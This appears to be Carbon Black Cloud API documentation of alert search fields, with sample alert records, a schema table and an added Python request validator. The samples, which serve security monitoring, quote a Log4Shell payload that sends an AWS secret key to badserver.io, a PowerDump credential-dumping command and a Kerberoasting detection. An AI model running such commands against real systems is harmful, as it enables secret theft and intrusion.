Search Fields - Alerts
Version: API v7
The following table lists the fields that can be returned in the response or used for searching with the Carbon Black Cloud using any of
Using the Schema
View the definition of each field, default values, whether it is required, searchable and/or tokenized. You can also see accepted values and routes supported per each field.
Possible Alert Types
Icons indicate the alert types a field is valid for.
- CB_ANALYTICS - These fields are part of a CB Analytics alert type
- CONTAINER_RUNTIME - These fields are part of a Container Runtime alert type
- WATCHLIST - These fields are part of a Watchlist alert type
- DEVICE_CONTROL - These fields are part of a Device Control alert type
- HOST_BASED_FIREWALL - These fields are part of a Host Based Firewall alert type
- INTRUSION_DETECTION_SYSTEM - These fields are part of an Intrusion Detection System alert type
- FACET - These fields can be used for returning most prevalent values.
Alert Type Examples
{
"org_key":"ABCD1234",
"alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:ca316d99-a808-3779-8aab-62b2b6d9541c&orgKey=ABCD1234",
"id":"ca316d99-a808-3779-8aab-62b2b6d9541c",
"type":"INTRUSION_DETECTION_SYSTEM",
"backend_timestamp":"2023-02-03T17:27:33.007Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-02-03T17:27:33.007Z",
"detection_timestamp":"2023-02-03T17:22:03.945Z",
"first_event_timestamp":"2023-02-03T17:22:03.945Z",
"last_event_timestamp":"2023-02-03T17:22:03.945Z",
"severity":1,
"reason":"HTTP traffic from asset DEV01-39X-1 matched IDS signature for threat CVE-2021-44228 Exploit",
"reason_code":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D:B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"threat_id":"bbe232a02b6c5583786503c25fe9a1d29d6ed39d3a295a6ff5c07f81629d0017",
"primary_event_id":"21AB6B27-9F72-11ED-A79A-005056A53F17",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{"change_timestamp":"2023-02-03T17:27:33.007Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"},
"determination":{"change_timestamp":"2023-02-03T17:27:33.007Z",
"value":"NONE",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION"},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":false,
"rule_category_id":"DC68DDD6-4B82-4AAF-9321-B4EBB32F5C2D",
"rule_id":"B5974D4D-265E-4FAF-8F71-2F76AAD67857",
"device_id":17482451,
"device_name":"DEV01-39X-1",
"device_uem_id":"",
"device_target_value":"MEDIUM",
"device_policy":"Standard",
"device_policy_id":165700,
"device_os":"WINDOWS",
"device_os_version":"Windows 10 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"66.170.99.2",
"device_internal_ip":"10.203.105.21",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"ttps":[],
"attack_tactic":"TA0001",
"attack_technique":"T1190",
"process_guid":"ABCD1234-010ac2d3-00001694-00000000-1d937f40884b9e0",
"process_pid":5780,
"process_name":"c:\\windows\\system32\\curl.exe",
"process_sha256":"d76d08c04dfa434de033ca220456b5b87e6b3f0108667bd61304142c54addbe4",
"process_md5":"eac53ddafb5cc9e780a7cc086ce7b2b1",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"curl -H \"Host: \\${jndi:ldap://\\{env:AWS_SECRET_ACCESS_KEY}.badserver.io}\" http://google.com/testingids",
"process_username":"DEV01-39X-1\\bit9qa",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-010ac2d3-0000225c-00000000-1d9300e2bb5211a",
"parent_pid":8796,
"parent_name":"c:\\windows\\system32\\cmd.exe",
"parent_sha256":"b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450",
"parent_md5":"8a2122e8162dbef04694b9c3e0b6cdee",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"\"C:\\WINDOWS\\system32\\cmd.exe\" ",
"parent_username":"DEV01-39X-1\\bit9qa",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"netconn_remote_port":80,
"netconn_local_port":49233,
"netconn_protocol":"",
"netconn_remote_domain":"google.com",
"netconn_remote_ip":"142.250.189.174",
"netconn_local_ip":"10.203.105.21",
"netconn_remote_ipv4":"142.250.189.174",
"netconn_local_ipv4":"10.203.105.21",
"tms_rule_id":"4b98443a-ba0d-4ff5-b99e-e5e70432a214",
"threat_name":"CVE-2021-44228 Exploit",
"threat_hunt_id": "0ff0725d-22c0-4b8f-95ea-a798e544e408",
"threat_hunt_name": "GroutLoader Test"
}
{
"org_key":"ABCD1234",
"alert_url":"defense-dev01.cbdtest.io/alerts?s[c][query_string]=id:f0c7970b-f23c-919e-0cd8-7a38bd373a6f&orgKey=ABCD1234",
"id":"f0c7970b-f23c-919e-0cd8-7a38bd373a6f",
"type":"CONTAINER_RUNTIME",
"backend_timestamp":"2023-02-06T00:13:37.663Z",
"user_update_timestamp":"2023-04-13T11:55:52.550Z",
"backend_update_timestamp":"2023-02-06T00:13:37.663Z",
"detection_timestamp":"2023-02-06T00:10:51.176Z",
"first_event_timestamp":"2023-02-06T00:09:19.320Z",
"last_event_timestamp":"2023-02-06T00:09:19.320Z",
"severity":5,
"reason":"Detected a connection to a public destination that isn't allowed for this scope",
"reason_code":"2e5170e7-2665-49d2-829e-f5bdeefe6b06:f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"threat_id":"0811c72d38d40951b4b90dba05638a20669c9f001ea2e65eeb4768f813d6ed0c",
"primary_event_id":"X0z55sxeTGWPfKuzPkFlCg-61",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-04-13T11:55:52.550Z",
"changed_by_type":"USER",
"changed_by":"janaw+csr@vmware.com",
"closure_reason":"NO_REASON",
"status":"IN_PROGRESS"
},
"determination":{
"change_timestamp":"2023-02-22T21:07:57.955Z",
"value":"NONE",
"changed_by_type":"USER",
"changed_by":"janaw+superadmin2@vmware.com"
},
"tags":["の結果"],
"alert_notes_present":false,
"threat_notes_present":true,
"is_updated":false,
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"netconn_remote_port":443,
"netconn_local_port":56618,
"netconn_protocol":"TCP",
"netconn_remote_domain":"westeurope.monitoring.azure.com",
"netconn_remote_ip":"20.50.65.82",
"netconn_local_ip":"10.244.2.22",
"netconn_remote_ipv4":"20.50.65.82",
"netconn_local_ipv4":"10.244.2.22",
"k8s_cluster":"tomer:sensor-aks",
"k8s_namespace":"kube-system",
"k8s_kind":"DaemonSet",
"k8s_workload_name":"ama-logs",
"k8s_pod_name":"ama-logs-gm5tt",
"k8s_policy_id":"2e5170e7-2665-49d2-829e-f5bdeefe6b06",
"k8s_policy":"Big runtime policy",
"k8s_rule_id":"f8b1637a-dc0c-49bb-bc28-5b48f97e6d58",
"k8s_rule":"Allowed public destinations",
"connection_type":"EGRESS",
"egress_group_id":"",
"egress_group_name":"",
"ip_reputation":96,
"remote_is_private":false
}
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:3d80bd8b-7770-40a7-8d6b-8268fb15c59f&orgKey=ABCD1234",
"id":"3d80bd8b-7770-40a7-8d6b-8268fb15c59f",
"type":"WATCHLIST",
"backend_timestamp":"2023-07-17T17:21:34.063Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-07-17T17:21:34.063Z",
"detection_timestamp":"2023-07-17T17:21:13.483Z",
"first_event_timestamp":"2023-07-17T17:19:00.412Z",
"last_event_timestamp":"2023-07-17T17:19:00.412Z",
"severity":10,
"reason":"Process powershell.exe was detected by the report \"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior\" in watchlist \"AMSI Threat Intelligence\"",
"reason_code":"cf4e6de7-4aa8-3188-8034-6a54fdea940c:e17d957d-b504-3462-816c-f182fe1d80ab",
"threat_id":"CF4E6DE74AA8B188C0346A54FDEA940C",
"primary_event_id":"VUX7Bu7vTrWwnU8-uSVh1A-0",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-07-17T17:21:34.063Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{
"change_timestamp":"2023-07-17T17:21:34.063Z",
"value":"NONE",
"changed_by_type":null,
"changed_by":null
},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":false,
"device_id":5890528,
"device_name":"ABT102675",
"device_uem_id":"596B6C4DD49AEF4AB3713363DDBB1F11",
"device_target_value":"MEDIUM",
"device_policy":"default",
"device_policy_id":6525,
"device_os":"WINDOWS",
"device_os_version":"Windows 11 x64",
"device_username":"DemoMachine",
"device_location":"UNKNOWN",
"device_external_ip":"49.206.61.4",
"device_internal_ip":"192.168.0.104",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"report_id":"LrKOC7DtQbm4g8w0UFruQg-b1c1ae83-f66b-4aa3-a496-363e296f4018",
"report_name":"Credential Access - AMSI - Suspect Kerberos Ticket Request Behavior",
"report_description":"Service accounts in Windows Active Directory environments have the ability to register under an AD security principle (user or computer) as a (SPN) Service Principal Name. The SPN registration allows for kerberos clients to request a kerberos service ticket associated with the service account SPN. This kerberos TGS is encrypted using the service accounts password. If a weak password is assigned to this service account an attacker can make an out of band request for one of these kerberos service tickets and crack it offline with tools like Jack the Ripper. This detection looks for fileless behaviors related to the out of band kerberos ticket request. If you are responding to this alert you should take immediate action and look at the process that alerted on this behavior as well as the other fileless script loads events.",
"report_tags":[
"credentialaccess",
"t1558",
"windows",
"amsi",
"attack",
"attackframework"
],
"report_link":"https://attack.mitre.org/techniques/T1558/003/",
"ioc_id":"b1c1ae83-f66b-4aa3-a496-363e296f4018",
"ioc_hit":"fileless_scriptload_cmdline:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\" OR scriptload_content:\"System.IdentityModel.Tokens.KerberosRequestorSecurityToken\"",
"watchlists":[{
"id":"Ci7w5B4URg6HN60hatQMQ",
"name":"AMSI Threat Intelligence"
}],
"process_guid":"ABCD1234-0059e1e0-00003544-00000000-1d9b8db27a4d423",
"process_pid":13636,
"process_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"process_sha256":"d436e66c0d092508e4b85290815ab375695fa9013c7423a3a27fed4f1acf90bd",
"process_md5":"0499440c4b0783266183246e384c6657",
"process_effective_reputation":"TRUSTED_WHITE_LIST",
"process_reputation":"TRUSTED_WHITE_LIST",
"process_cmdline":"powershell.exe -NoLogo -InputFormat Text -NoExit -ExecutionPolicy Unrestricted -Command -",
"process_username":"NT AUTHORITY\\SYSTEM",
"process_issuer":["Microsoft Windows Production PCA 2011"],
"process_publisher":["Microsoft Windows"],
"parent_guid":"ABCD1234-0059e1e0-00002890-00000000-1d9a898aa24acc9",
"parent_pid":10384,
"parent_name":"c:\\program files\\unowhy\\hisqool manager\\hisqoolmanager.exe",
"parent_sha256":"4ab2c4932e01ab8460bd8bff5afb0c76e9e238c10ce47515be40c49f652d0282",
"parent_md5":"c7e583681f0958d4f5d32afd09d8084b",
"parent_effective_reputation":"NOT_LISTED",
"parent_reputation":"NOT_LISTED",
"parent_cmdline":"\"C:\\Program Files\\Unowhy\\HiSqool Manager\\HiSqoolManager.exe\" ",
"parent_username":"NT AUTHORITY\\SYSTEM",
"childproc_guid":"",
"childproc_username":"",
"childproc_cmdline":"",
"ml_classification_final_verdict":"ANOMALOUS",
"ml_classification_global_prevalence":"MEDIUM",
"ml_classification_org_prevalence":"LOW"
}
{
"org_key":"ABCD1234",
"alert_url":"defense.conferdeploy.net/alerts?s[c][query_string]=id:411eedfc-8408-2f9e-59f2-a83dfaae0ec1&orgKey=ABCD1234",
"id":"411eedfc-8408-2f9e-59f2-a83dfaae0ec1",
"type":"CB_ANALYTICS",
"backend_timestamp":"2023-07-17T17:16:50.960Z",
"user_update_timestamp":null,
"backend_update_timestamp":"2023-07-17T17:29:19.996Z",
"detection_timestamp":"2023-07-17T17:15:51.708Z",
"first_event_timestamp":"2023-07-17T17:15:33.396Z",
"last_event_timestamp":"2023-07-17T17:27:59.192Z",
"severity":5,
"reason":"A known virus (HackTool: Powerpuff) was detected running.",
"reason_code":"T_REP_VIRUS",
"threat_id":"9e0afc389c1acc43b382b1ba590498d2",
"primary_event_id":"94953e4524c511ee86284f0541a5184d",
"policy_applied":"NOT_APPLIED",
"run_state":"RAN",
"sensor_action":"ALLOW",
"workflow":{
"change_timestamp":"2023-07-17T17:16:50.960Z",
"changed_by_type":"SYSTEM",
"changed_by":"ALERT_CREATION",
"closure_reason":"NO_REASON",
"status":"OPEN"
},
"determination":{
"change_timestamp":"2023-07-17T17:16:50.960Z",
"value":"NONE",
"changed_by_type":null,
"changed_by":null
},
"tags":null,
"alert_notes_present":false,
"threat_notes_present":false,
"is_updated":true,
"device_id":6948863,
"device_name":"Kognos-W19-CB-3",
"device_uem_id":"",
"device_target_value":"MISSION_CRITICAL",
"device_policy":"SSQ_Policy",
"device_policy_id":112221,
"device_os":"WINDOWS",
"device_os_version":"Windows Server 2019 x64",
"device_username":"demouser@demo.org",
"device_location":"OFFSITE",
"device_external_ip":"34.234.170.45",
"device_internal_ip":"10.0.14.120",
"mdr_alert":false,
"mdr_alert_notes_present":false,
"mdr_threat_notes_present":false,
"ttps":[
"MALWARE_APP",
"RUN_MALWARE_APP",
"MITRE_T1059_CMD_LINE_OR_SCRIPT_INTER",
"FILELESS",
"MITRE_T1059_001_POWERSHELL"
],
"attack_tactic":"",
"attack_technique":"",
"process_guid":"ABCD1234-006a07ff-00000e10-00000000-1d9b8d24ab16c73",
"process_pid":3600,
"process_name":"c:\\users\\administrator\\appdata\\local\\temp\\powerdump.ps1",
"process_sha256":"3b463c94b52414cfaad61ecdac64ca84eaea1ab4be69f75834aaa7701ab5e7d0",
"process_md5":"42a80cc2333b612b63a859f17474c9af",
"process_effective_reputation":"KNOWN_MALWARE",
"process_reputation":"KNOWN_MALWARE",
"process_cmdline":"\"powershell.exe\" & {Write-Host \\\"\"STARTING TO SET BYPASS and DISABLE DEFENDER REALTIME MON\\\"\" -fore green\nImport-Module \\\"\"$Env:Temp\\PowerDump.ps1\\\"\"\nInvoke-PowerDump}",
"process_username":"KOGNOS-W19-CB-3\\Administrator",
"process_issuer":[],
"process_publisher":[],
"parent_guid":"ABCD1234-006a07ff-00000fb8-00000000-1d9b8d2494e29ed",
"parent_pid":4024,
"parent_name":"c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe",
"parent_sha256":"de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
"parent_md5":"",
"parent_effective_reputation":"TRUSTED_WHITE_LIST",
"parent_reputation":"TRUSTED_WHITE_LIST",
"parent_cmdline":"",
"parent_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_guid":"ABCD1234-006a07ff-00000000-00000000-19db1ded53e8000",
"childproc_name":"",
"childproc_sha256":"",
"childproc_md5":"",
"childproc_effective_reputation":"RESOLVING",
"childproc_username":"KOGNOS-W19-CB-3\\Administrator",
"childproc_cmdline":""
}
Additional indicators
- Searchable - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests, e.g. process_name:chrome.exe
- Searchable Array - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an array that may contain multiple values
- Searchable Time Range - Indicates that the field can be used in the criteria, exclusion or query elements of alerts requests and that in criteria and exclusion elements it is an object with either start and end parameters or a range parameter. See Alerts API - Time Range Filter for more details.
- Sortable - Indicates that the field can be used in sort request
- All fields can be specified for inclusion in the Export Alerts results
Searching across both Endpoint Standard and Enterprise EDR data? See below for limitations.
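To turn the indicators above into a request-side check, here is an added Python example (not Carbon Black's code) that builds an Alerts API v7 search body and enforces the rules the list and the table state: Searchable Array fields take lists, Searchable Time Range fields take a start/end or range object, backend_timestamp is searched only through the top-level time_range, sort uses Sortable fields only, and a field is only combined with alert types it is valid for. FIELD_SCHEMA is a hand-copied subset of the table; the `type` criteria field, the sort entry shape and the ASC/DESC order values are assumptions.

```python
from __future__ import annotations

from datetime import datetime
from typing import Any

SCALAR, ARRAY, TIME_RANGE = "Searchable", "Searchable Array", "Searchable Time Range"

ALL = frozenset({"CB_ANALYTICS", "HOST_BASED_FIREWALL", "CONTAINER_RUNTIME",
                 "DEVICE_CONTROL", "WATCHLIST", "INTRUSION_DETECTION_SYSTEM"})
PROCESS = ALL - {"CONTAINER_RUNTIME", "DEVICE_CONTROL"}
NETCONN = ALL - {"DEVICE_CONTROL"}
K8S = frozenset({"CONTAINER_RUNTIME"})

# field -> (search kind, sortable, alert types the field is valid for); subset of the table.
FIELD_SCHEMA: dict[str, tuple[str | None, bool, frozenset[str]]] = {
    "type": (ARRAY, False, ALL),  # assumption: filterable like the other array fields
    "alert_notes_present": (SCALAR, False, ALL),
    "minimum_severity": (SCALAR, False, ALL),
    "determination_value": (ARRAY, False, ALL),
    "device_target_value": (ARRAY, True, ALL - {"CONTAINER_RUNTIME"}),
    "childproc_effective_reputation": (ARRAY, False, PROCESS),
    "netconn_remote_port": (ARRAY, False, NETCONN),
    "k8s_cluster": (ARRAY, False, K8S),
    "k8s_workload_name": (ARRAY, True, K8S),
    "detection_timestamp": (TIME_RANGE, True, ALL),
    "backend_update_timestamp": (TIME_RANGE, True, ALL),
    "first_event_timestamp": (TIME_RANGE, True, ALL),
    "last_event_timestamp": (TIME_RANGE, True, ALL),
    # Sortable, but per the table note not valid in criteria: the top-level
    # time_range element is how backend_timestamp is searched.
    "backend_timestamp": (None, True, ALL),
}


def _iso8601_utc(where: str, value: Any) -> datetime:
    """Accept the page's ISO 8601 UTC form, e.g. 2023-02-03T17:27:33.007Z."""
    if not isinstance(value, str) or not value.endswith("Z"):
        raise ValueError(f"{where}: expected an ISO 8601 UTC string ending in Z, got {value!r}")
    try:
        return datetime.fromisoformat(value[:-1])
    except ValueError as exc:
        raise ValueError(f"{where}: unparseable timestamp {value!r}") from exc


def _check_time_range(where: str, value: Any) -> None:
    """Time Range Object: either start and end, or a single range parameter."""
    if not isinstance(value, dict):
        raise ValueError(f"{where}: time range must be an object")
    keys = set(value)
    if keys == {"start", "end"}:
        if _iso8601_utc(f"{where}.start", value["start"]) > _iso8601_utc(f"{where}.end", value["end"]):
            raise ValueError(f"{where}: start is after end")
    elif keys == {"range"}:
        # The range syntax itself is defined in the Time Range Filter doc, not on this page.
        if not isinstance(value["range"], str) or not value["range"]:
            raise ValueError(f"{where}: range must be a non-empty string")
    else:
        raise ValueError(f"{where}: use either start and end, or range; got {sorted(keys)}")


def _check_filter(where: str, filt: dict[str, Any], alert_types: frozenset[str] | None) -> None:
    """Validate one criteria or exclusions element against the indicator kinds."""
    for field, value in filt.items():
        if field not in FIELD_SCHEMA:
            raise ValueError(f"{where}.{field}: unknown or non-searchable field")
        kind, _, valid_types = FIELD_SCHEMA[field]
        if kind is None:
            raise ValueError(f"{where}.{field}: not valid in {where}; use the top-level time_range")
        if alert_types is not None and field != "type" and not (alert_types & valid_types):
            raise ValueError(f"{where}.{field}: not valid for alert types {sorted(alert_types)}")
        if kind == ARRAY:
            ok = isinstance(value, list) and value and all(
                isinstance(v, (str, int)) and not isinstance(v, bool) for v in value)
            if not ok:
                raise ValueError(f"{where}.{field}: Searchable Array fields take a non-empty list")
        elif kind == SCALAR:
            if isinstance(value, (list, dict)):
                raise ValueError(f"{where}.{field}: Searchable (non-array) fields take one value")
        else:
            _check_time_range(f"{where}.{field}", value)


def build_alert_search(*, criteria: dict[str, Any] | None = None,
                       exclusions: dict[str, Any] | None = None, query: str | None = None,
                       time_range: dict[str, Any] | None = None,
                       sort: list[dict[str, str]] | None = None) -> dict[str, Any]:
    """Return a request body, or raise ValueError naming the rule that was broken."""
    criteria, exclusions = dict(criteria or {}), dict(exclusions or {})
    types = criteria.get("type")
    alert_types = frozenset(types) if isinstance(types, list) else None
    if alert_types is not None and not alert_types <= ALL:
        raise ValueError(f"criteria.type: unknown alert types {sorted(alert_types - ALL)}")
    _check_filter("criteria", criteria, alert_types)
    _check_filter("exclusions", exclusions, alert_types)
    body: dict[str, Any] = {}
    if criteria:
        body["criteria"] = criteria
    if exclusions:
        body["exclusions"] = exclusions
    if query is not None:
        if not isinstance(query, str) or not query.strip():
            raise ValueError("query: must be a non-empty string such as process_name:chrome.exe")
        body["query"] = query
    if time_range is not None:
        _check_time_range("time_range", time_range)
        body["time_range"] = time_range
    if sort is not None:
        # Assumed sort entry shape: {"field": <Sortable field>, "order": "ASC" | "DESC"}.
        for entry in sort:
            field = entry.get("field", "")
            if field not in FIELD_SCHEMA or not FIELD_SCHEMA[field][1]:
                raise ValueError(f"sort: {field!r} is not a Sortable field")
            if entry.get("order") not in ("ASC", "DESC"):
                raise ValueError(f"sort.{field}: order must be ASC or DESC")
        body["sort"] = sort
    return body


def validation_error(**kwargs: Any) -> str | None:
    """The ValueError message a request would raise, or None if it is valid."""
    try:
        build_alert_search(**kwargs)
    except ValueError as exc:
        return str(exc)
    return None
```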
Schema
Note: Additional details and examples can be found in the Carbon Black Cloud console search guide.
Field Name | Definition | Datatype | Alert Types Supported |
---|---|---|---|
alert_notes_present | Searchable. True if notes are present on the alert ID. False if notes are not present. | Boolean | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
alert_origin | Searchable. How the alert was created. | String: MDR, MDR_THREAT_HUNT | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
alert_url | Link to the alerts page for this alert. Does not vary by alert type | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
attack_tactic | Searchable Array. A tactic from the MITRE ATT&CK framework; defines a reason for an adversary's action, such as achieving credential access | String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
attack_technique | Searchable Array. A technique from the MITRE ATT&CK framework; defines an action an adversary takes to accomplish a goal, such as dumping credentials to achieve credential access | String | CB_ANALYTICS WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
backend_timestamp (Use time_range in search requests) | Searchable Time Range, Sortable. Timestamp when the Carbon Black Cloud processed and enabled the alert for searching. Corresponds to the Created column on the Alerts page. This field is searched by the time_range request field and defaults to the previous two weeks on requests that include this field. | ISO 8601 UTC Date String. Note: This field is not valid in criteria. The top-level parameter time_range must be used. Uses the Time Range Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
backend_update_timestamp | Searchable Time Range, Sortable. Timestamp when the Carbon Black Cloud initiated and processed an update to an alert. Corresponds to the Updated column on the Alerts page. Note that changes made by users do not change this date; those changes are reflected on user_update_timestamp | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_effective_reputation | Searchable Array. Effective reputation of the blocked file or process; applied by the sensor at the time the block occurred | String: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_md5 | Searchable Array. MD5 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_name | Searchable Array. Tokenized file path of the files blocked by sensor action | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
blocked_sha256 | Searchable Array. SHA-256 hash of the child process binary; for any process terminated by the sensor | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_cmdline | Searchable Array. Command line for the child process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_effective_reputation | Searchable Array. Effective reputation of the child process; applied by the sensor at the time the event occurred | String: ADAPTIVE_WHITE_LIST, COMMON_WHITE_LIST, COMPANY_BLACK_LIST, COMPANY_WHITE_LIST, PUP, TRUSTED_WHITE_LIST, RESOLVING, COMPROMISED_OBSOLETE, DLP_OBSOLETE, IGNORE, ADWARE, HEURISTIC, SUSPECT_MALWARE, KNOWN_MALWARE, ADMIN_RESTRICT_OBSOLETE, NOT_LISTED, GRAY_OBSOLETE, NOT_COMPANY_WHITE_OBSOLETE, LOCAL_WHITE, NOT_SUPPORTED | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
childproc_guid | Searchable Array. Unique process identifier assigned to the child process | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_md5 | Searchable Array. Hash of the child process' binary (Enterprise EDR) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_name | Searchable Array. Filesystem path of the child process' binary | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_sha256 | Searchable Array. Hash of the child process' binary (Endpoint Standard) | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
childproc_username | Searchable Array. User context in which the child process was executed | String | CB_ANALYTICS HOST_BASED_FIREWALL WATCHLIST INTRUSION_DETECTION_SYSTEM |
connection_type | Searchable Array. Connection Type | String: INTERNAL_INBOUND, INTERNAL_OUTBOUND, INGRESS, EGRESS | CONTAINER_RUNTIME FACET |
detection_timestamp | Searchable Time Range, Sortable. Timestamp when the alert was first detected. For sensor-sent alerts, this is the time of the event on the sensor. For alerts generated on the backend, this is the time the backend system triggered the alert. | ISO 8601 UTC Date String. Note: When used as criteria the search is within the period specified by time_range on that request and uses the Time Range Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination | User-updatable determination of the alert | Nested Response Object | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_change_timestamp | Searchable Time Range. When the determination was updated. | ISO 8601 UTC Date String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_changed_by | User the determination was changed by. | String | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
determination_changed_by_type | Searchable. | String: SYSTEM, USER, API, AUTOMATION | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
determination_value | Searchable Array. Determination of the alert set by a user | String: NONE, TRUE_POSITIVE, FALSE_POSITIVE | CB_ANALYTICS HOST_BASED_FIREWALL CONTAINER_RUNTIME DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_external_ip | Searchable Array. IP address of the endpoint according to the Carbon Black Cloud; can differ from device_internal_ip due to network proxy or NAT; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_id | Searchable Array. ID of devices | Integer | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_internal_ip | Searchable Array. IP address of the endpoint reported by the sensor; either IPv4 (dotted decimal notation) or IPv6 (proprietary format) | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_location | Searchable Array. Whether the device was on or off premises when the alert started, based on the current IP address and the device's registered DNS domain suffix | String: ONSITE, OFFSITE, UNKNOWN | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
device_name | Searchable Array. Device name | String | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM FACET |
device_os | Searchable Array. Device Operating Systems | String: WINDOWS, MAC, LINUX, OTHER | CB_ANALYTICS HOST_BASED_FIREWALL DEVICE_CONTROL WATCHLIST INTRUSION_DETECTION_SYSTEM |
